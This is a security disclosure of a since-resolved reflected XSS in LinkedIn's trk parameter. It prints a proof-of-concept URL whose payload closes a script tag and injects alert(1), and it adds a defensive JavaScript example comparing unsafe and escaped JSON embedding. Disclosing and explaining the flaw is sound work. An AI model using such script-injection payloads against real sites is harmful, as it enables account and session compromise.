linkedin.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Resolved

Resolved: XSS in trk parameter of www.linkedin.com as an authenticated user.

Reported to security@linkedin.com on June 11, 2013 and resolved today, August 18, 2013.

PoC URL

http://www.linkedin.com/today/?trk=today_home_top_today_control</script><script>alert(1)</script>

MATCH ON:

fs.config({"failureRedirect":"http://www.linkedin.com/nhome/","xhrHeaders":{"X-FS-Origin-Request":"/today/?trk=today_home_top_today_control</script><script>alert(1)</script>","X-FS-Page-Id":"pulse-top-news"}});

REQUIRED: Logged In User

Script injection to www.linkedin.com via trk parameter
XSS in linkedin.com
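The match above shows the root cause: the request path (including the trk parameter) is serialised into a JSON object that is then written into an inline script block. JSON serialisation escapes quotes and backslashes, but it leaves `<` and `>` untouched, so a `</script>` inside a string value terminates the script element and the HTML parser starts a new one. The example below is added here and is not LinkedIn's code; it reconstructs the unsafe embedding from the matched response and places it next to a hardened version that unicode-escapes the characters the HTML tokenizer cares about. The function names (`buildInlineScriptUnsafe`, `buildInlineScriptSafe`, `jsonForScript`, `scriptEndTagCount`) and the `buildConfig` shape are assumptions made for the example; the sample request path is the one from the report.

```javascript
// Added example, not LinkedIn's code. Demonstrates why JSON.stringify alone is
// not enough when request-derived data is embedded in an inline <script>, and
// how unicode-escaping '<', '>', '&' and the line separators fixes it.
// Names below (buildConfig, buildInlineScriptUnsafe, buildInlineScriptSafe,
// jsonForScript, scriptEndTagCount) are assumptions for this example.

// Request path as it appeared in the report (constructed sample input).
const REQUEST_PATH =
  '/today/?trk=today_home_top_today_control</script><script>alert(1)</script>';

// Assumed shape of the config object seen in the matched response.
function buildConfig(requestPath) {
  return {
    failureRedirect: 'http://www.linkedin.com/nhome/',
    xhrHeaders: {
      'X-FS-Origin-Request': requestPath,
      'X-FS-Page-Id': 'pulse-top-news',
    },
  };
}

// Unsafe: JSON.stringify escapes '"' and '\', but not '<' or '>'.  A
// '</script>' inside a string value ends the script element early, and
// everything after it is parsed as fresh HTML.
function buildInlineScriptUnsafe(requestPath) {
  return '<script>fs.config(' + JSON.stringify(buildConfig(requestPath)) + ');</script>';
}

// Hardened: serialise to JSON, then replace the characters that matter to the
// HTML parser (and the two JS line terminators) with \uXXXX escapes.  The
// result is still valid JSON and valid JavaScript, and the HTML tokenizer
// never sees a literal '<' inside the script block.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function buildInlineScriptSafe(requestPath) {
  return '<script>fs.config(' + jsonForScript(buildConfig(requestPath)) + ');</script>';
}

// How many script end tags would an HTML tokenizer see in this markup?
// Exactly one (the real closing tag) is what we want.
function scriptEndTagCount(html) {
  return (html.match(/<\/script>/gi) || []).length;
}

// Stand-alone demonstration.
console.log('unsafe end tags:', scriptEndTagCount(buildInlineScriptUnsafe(REQUEST_PATH)));
console.log('safe end tags:  ', scriptEndTagCount(buildInlineScriptSafe(REQUEST_PATH)));
console.log(buildInlineScriptSafe(REQUEST_PATH));
```

The escaped form round-trips: `JSON.parse` on the output of `jsonForScript` yields the original object, so the client-side `fs.config(...)` call receives exactly the same data; only the bytes on the wire change. Serving a Content-Security-Policy that disallows inline script is a complementary defence, but the escaping is what removes the injection itself.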

Commentary: LinkedIn has a Vulnerability Rewards Program which results in sending a T-Shirt, which is ridiculous. Instead, it's suggested that LinkedIn donate US$1,000.00 to the American Cancer Society for Melanoma and Squamous Cell Carcinoma Research.